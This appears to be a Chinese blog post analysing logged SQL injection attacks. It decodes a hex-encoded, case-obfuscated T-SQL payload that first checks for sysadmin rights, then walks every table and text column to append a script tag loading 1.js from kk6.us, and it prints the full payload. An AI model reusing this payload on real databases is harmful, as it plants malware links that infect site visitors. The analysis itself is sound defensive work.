关于 kk6.us 的一个文章


 原文地址忘记了 不好意思
       上次说到SQL注入方法用HEX可绕过一般的IDS,果然这几天网站记录了此类非法扫描记录,还好俺的网站事先有准备,来看一下这些鸟人都干了些什么,检查了日志文件,找几个记录:

提交参数:1 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1

解码一下这个:0x730079007300610064006D0069006E00
内容:sysadmin

这很明白,首先判断是否是sysadmin权限,下来就到这个:

提交参数:1';dEcLaRe @s vArChAr(4000);sEt @s=cAsT(0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f2536622536622533362532652537352537332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f520d0a aS vArChAr(4000));exec(@s);--

再解码一下内容变成了:dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(vArChAr,['+@c+']))+''</title><script src=http://%6b%6b%36%2e%75%73/1.js></script>''') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR

看来还是有点乱,再把上面的转换成小写:declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar,['+@c+']))+''</title><script src=http://%6b%6b%36%2e%75%73/1.js></script>''') fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor

好了,经过解码基本能看明白了,简单解释一下,只要系统存在SQL注入,上面的代码将会被执行,通过游标遍历数据库中的所有表和列并在列中插入代码:</title><script src=http://%6b%6b%36%2e%75%73/1.js></script>

其中(%6b%6b%36%2e%75%73)这段也是经过URL编码的,解码一下变成了:kk6.us
也就是在数据库列中插入代码::</title><script src=http://kk6.us/1.js></script>

好了,只要你的网页从数据库中读取带有此代码的列,便会出现错误,也就是会从kk6.us中读取1.js文件,只要你访问,嘿嘿,你完了……
 

<script src="http://www.cdsbfx.com/js/google.js" type="text/javascript"></script> <script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript"></script>
展开阅读全文

没有更多推荐了,返回首页